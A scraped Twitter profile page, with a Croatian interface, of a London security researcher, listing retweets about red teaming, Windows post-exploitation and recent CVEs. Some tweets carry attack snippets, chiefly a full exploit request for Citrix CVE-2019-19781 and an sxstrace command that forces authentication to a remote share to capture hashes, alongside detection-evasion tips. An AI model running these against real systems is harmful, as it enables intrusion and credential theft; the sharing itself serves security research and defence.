John⠠⠵

@xpirabit

security dude

London, England
Vrijeme pridruživanja: siječanj 2014.
5 fotografija ili videozapisa Fotografije i videozapisi

Tweetovi

Blokirali ste korisnika/cu @xpirabit

Jeste li sigurni da želite vidjeti te tweetove? Time nećete deblokirati korisnika/cu @xpirabit

  1. proslijedio/la je Tweet
    3. velj

    Really glad to finally get a blogpost out about this. Hopefully this is useful and gives Red Teamers ideas on how to use the BYOI concept in their own payloads. If anyone is interested in a few more follow up posts about this will gladly oblige :)

    174 proslijeđena tweeta 318 korisnika označava da im se sviđa
    Poništi
  2. proslijedio/la je Tweet
    2. velj

    This month I learnt how to analyse the JavaScript of a React Native application while bounty hunting. I wanted to share what I found out with everyone else.

    9 replies 207 proslijeđenih tweetova 564 korisnika označavaju da im se sviđa
    Poništi
  3. proslijedio/la je Tweet
    1. velj

    Load encrypted PE from XML Attribute. MSBuild is still the best.😅 MSBuild sets Property then calls Execute. Use this example to decouple payloads & prove that all security products have a "Single File Bias". Decouple payloads to subvert detection.

    5 replies 149 proslijeđenih tweetova 309 korisnika označava da im se sviđa
    Prikaži ovu nit
    Prikaži ovu nit
    Poništi
  4. proslijedio/la je Tweet
    28. sij

    New blog (and tool): Attacking Azure, Azure AD, and Introducing PowerZure

    12 replies 385 proslijeđenih tweetova 794 korisnika označavaju da im se sviđa
    Prikaži ovu nit
    Prikaži ovu nit
    Poništi
  5. proslijedio/la je Tweet
    24. sij

    A new way to exfiltrate hash by forcing auth ? Check this : sxstrace parse -logfile:\\192.168.XX.XX\lol.etl -outfile:a.txt || sxstrace trace -logfile:\\192.168.xx.xx\a   cc

    113 proslijeđenih tweetova 254 korisnika označavaju da im se sviđa
    Poništi
  6. proslijedio/la je Tweet
    24. sij

    Post-exploitation tip: Do you know how to trivially & remotely hijack an session without prompt nor warning on user's side using signed binary (no patch/multi-session) ? qwinsta+mstsc shadowing is the answer ;) Details:

    7 replies 346 proslijeđenih tweetova 818 korisnika označava da im se sviđa
    Poništi
  7. proslijedio/la je Tweet
    23. sij

    Windows Red Team Cheat Sheet

    1 reply 157 proslijeđenih tweetova 410 korisnika označava da im se sviđa
    Poništi
  8. proslijedio/la je Tweet
    22. sij

    Run the following PS command on your AD. See how many accounts don't require a password. As in, the password could be NULL and you can just login without anything in the password field. 'Get-ADUser -Filter 'useraccountcontrol -band 32' -Properties useraccountcontrol | FT Name'

    9 replies 59 proslijeđenih tweetova 228 korisnika označava da im se sviđa
    Prikaži ovu nit
    Prikaži ovu nit
    Poništi
  9. proslijedio/la je Tweet
    22. sij

    Here is the link to the SpecterOps Adversary Tactics: PowerShell course material: Enjoy! For information about our current training offerings, information can be found here: (4/4)

    20 replies 533 proslijeđena tweeta 952 korisnika označavaju da im se sviđa
    Prikaži ovu nit
    Prikaži ovu nit
    Poništi
  10. proslijedio/la je Tweet
    22. sij

    Revisiting RDP lateral movement and releasing a project that will be part of a bigger tool coming next week

    25 replies 485 proslijeđenih tweetova 884 korisnika označavaju da im se sviđa
    Poništi
  11. proslijedio/la je Tweet
    19. sij

    command-line MSBuild.exe detection's got your down? How about MSBuild without MSBuild.exe?

    7 replies 254 proslijeđena tweeta 526 korisnika označava da im se sviđa
    Poništi
  12. proslijedio/la je Tweet
    15. sij

    Fun fact for the day: IntegrityLevel within process creation events provides context to detection opportunities. Example: Open powershell as administrator, the integrity is "High". Processes running under that process will now be high as well. (1/5)

    22 proslijeđena tweeta 61 korisnik označava da mu se sviđa
    Prikaži ovu nit
    Prikaži ovu nit
    Poništi
  13. proslijedio/la je Tweet
    16. sij

    Ported CVE-2019-19781 to NSE

    87 proslijeđenih tweetova 156 korisnika označava da im se sviđa
    Poništi
  14. proslijedio/la je Tweet
    16. sij

    CVE-2020-0601 - PoC for code signing PE files using a Certificate Authority using ECC

    5 replies 336 proslijeđenih tweetova 578 korisnika označava da im se sviđa
    Prikaži ovu nit
    Prikaži ovu nit
    Poništi
  15. proslijedio/la je Tweet
    15. sij

    CVE-2020-0601

    1.172 proslijeđena tweeta 2.590 korisnika označava da im se sviđa
    Prikaži ovu nit
    Prikaži ovu nit
    Poništi
  16. proslijedio/la je Tweet
    15. sij

    A perfect summary of the Windows CryptoAPI spoofing vulnerability CVE-2020-0601 that Microsoft patched today. Like the old adage says, two screenshots are worth a thousand words.

    Tweet je nedostupan.
    52 proslijeđena tweeta 91 korisnik označava da mu se sviđa
    Poništi
  17. proslijedio/la je Tweet
    14. sij

    Voting is now open for the top 10 new web hacking techniques of 2019:

    134 proslijeđena tweeta 298 korisnika označava da im se sviđa
    Poništi
  18. proslijedio/la je Tweet
    13. sij

    For team blue: Turns out CVE-2019-19781 doesn't need a traversal, beware. POST /vpns/portal/scripts/newbm.pl HTTP/1.1 Host: <target> NSC_USER: ../../../netscaler/portal/templates/si NSC_NONCE: 5 Content-Length: 53 url=a&title=[%+({'BLOCK'='print+`id`'})%]

    6 replies 165 proslijeđenih tweetova 410 korisnika označava da im se sviđa
    Poništi
  19. proslijedio/la je Tweet
    13. sij

    Modern C2 Infrastructure with Terraform, DigitalOcean, Covenant and Cloudflare

    1 reply 61 proslijeđeni tweet 168 korisnika označava da im se sviđa
    Poništi
  20. proslijedio/la je Tweet
    13. sij

    If a subdomain returns a default/under construction or dead page, it may still be worth to run it through 's getallurl + 's concurl tools to request all URLs & identify any URLs with different response. See image for commands.

    1 reply 64 proslijeđena tweeta 163 korisnika označavaju da im se sviđa
    Poništi

@xpirabit još nije objavio nijedan Tweet.

Čini se da učitavanje traje već neko vrijeme.

Twitter je možda preopterećen ili ima kratkotrajnih poteškoća u radu. Pokušajte ponovno ili potražite dodatne informacije u odjeljku Status Twittera.

    Možda bi vam se svidjelo i ovo:

    ·